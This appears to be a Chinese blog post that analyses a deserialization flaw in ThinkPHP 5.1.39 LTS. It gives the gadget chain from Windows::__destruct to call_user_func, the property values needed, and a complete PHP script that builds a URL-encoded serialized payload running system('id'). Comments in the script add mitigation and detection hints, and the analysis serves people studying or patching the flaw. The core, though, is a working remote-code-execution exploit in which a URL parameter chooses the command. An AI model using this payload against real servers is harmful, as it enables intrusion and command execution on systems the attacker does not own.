
Thinkphp v5.1.39 LTS 反序列化漏洞分析 及 EXP(poc)

2021年07月22日 09:54 汪洋大海 暂无评论 共1593字 (阅读5,771 views次)

POP链为:

Windows::__destruct --> Pivot::__toString --> Request::__call --> Request::isAjax --> Request::param --> Request::input --> Request::filterValue --> call_user_func

EXP(POC):
倘若要执行system('id'),则需要控制变量为以下值

Request->filter = "system";
Request->param = array('id');
Request->hook['visible'] = [$this,"isAjax"];
Request->config['var_ajax'] = '';
Pivot->data = ["azhe" => new Request()];
Pivot->append = ["azhe" => ["4ut","15m"]];
Windows->files = [new Pivot()];

---exp---
<?php

namespace think;
// Stand-in for think\Model used only to build the serialized object graph.
// Only the two properties the chain reads are declared; their names and
// visibility are part of the serialized form (a private property is
// name-mangled with its class), so they have to match the framework class
// for the payload to land in the real Model on unserialize().
// Defender note: this object graph is only dangerous where an application
// hands request-controlled bytes to unserialize(); json_decode() for data
// exchange and strict allowed_classes removes the entry point.
abstract class Model{
	// Read back as $this->data by Model::__toString -> toArray (per the chain on this page);
	// the Request object placed here is what later receives the visible() call.
	private $data = [];
	// Key "azhe" must exist in both $data and $append so the append branch reaches the Request.
	protected $append = [];
	public function __construct(){
		$this->data = ["azhe" => new Request()];
		$this->append = ["azhe" => ["4ut","15m"]];
	}
}

// Stand-in for think\Request carrying the properties the chain reads:
// $hook drives Request::__call, $config/$param/$filter drive isAjax -> param
// -> input -> filterValue -> call_user_func (see the chain on this page).
// Detection hint: a framework Request object arriving through unserialize()
// with a non-empty $filter that is a callable name (here "system") is not
// something normal application flow produces.
class Request{
	protected $config = [
        // form request-method override variable
        'var_method'       => '_method',
        // form ajax spoof variable
        'var_ajax'         => '_ajax',
        // form pjax spoof variable
        'var_pjax'         => '_pjax',
        // PATHINFO variable name, used in compatibility mode
        'var_pathinfo'     => 's',
        // compatible PATH_INFO retrieval keys
        'pathinfo_fetch'   => ['ORIG_PATH_INFO', 'REDIRECT_PATH_INFO', 'REDIRECT_URL'],
        // default global filter method(s), comma-separated
        'default_filter'   => '',
        // domain root, e.g. thinkphp.cn
        'url_domain_root'  => '',
        // HTTPS proxy flag
        'https_agent_name' => '',
        // IP proxy header name
        'http_agent_ip'    => 'HTTP_X_REAL_IP',
        // URL pseudo-static suffix
        'url_html_suffix'  => 'html',
    ];
    // Values that reach filterValue(); the page sets this to the argument of the command.
    protected $param = [];
    // Method-name => callable map consulted by Request::__call for undefined methods.
    protected $hook = [];
    // Filter name applied by filterValue() via call_user_func — the sink of the chain.
    protected $filter;
    public function __construct(){
    	$this->filter = "system";
    	// "visible" is the method Model::toArray calls on the object in $data; it is routed
    	// through __call to isAjax() because Request has no visible() method.
    	$this->hook = ["visible" => [$this, "isAjax"]];
    	$this->param = array('id');	// The command can be fixed here or left unset: Request::param refreshes this value from the submitted parameters, so a parameter supplied in the URL is executed as well.
        // Emptied so isAjax() falls through to param(); confirm against Request::isAjax in 5.1.39.
        $this->config['var_ajax'] = '';
    }
}

namespace think\process\pipes;
use think\Model\Pivot;
// Stand-in for think\process\pipes\Windows: the chain's entry point.
// Its __destruct (not reproduced here) is what touches $files and triggers
// Pivot::__toString; $files is private, so the serialized property name is
// mangled with this exact class name.
// Note the `use think\Model\Pivot;` above resolves to the think\model\Pivot
// declared below because PHP namespaces are case-insensitive.
class Windows{
	// List of "file" entries; an object here is stringified when the destructor runs.
	private $files ;
    public function __construct(){
        $this->files = [new Pivot()];
    }
}

namespace think\model;
use think\Model;
// Concrete subclass standing in for think\model\Pivot; Model is abstract, so a
// non-abstract class is needed to instantiate the object graph. It inherits
// Model's constructor and properties unchanged.
class Pivot extends Model{
}

use think\process\pipes\Windows;
// Prints the URL-encoded serialized object graph. It has no effect on its own;
// the impact exists only where an application passes request data to
// unserialize(). Mitigation: never unserialize untrusted input (use
// json_decode), or restrict unserialize() with allowed_classes.
echo urlencode(serialize(new Windows()))."\n";
?>

 
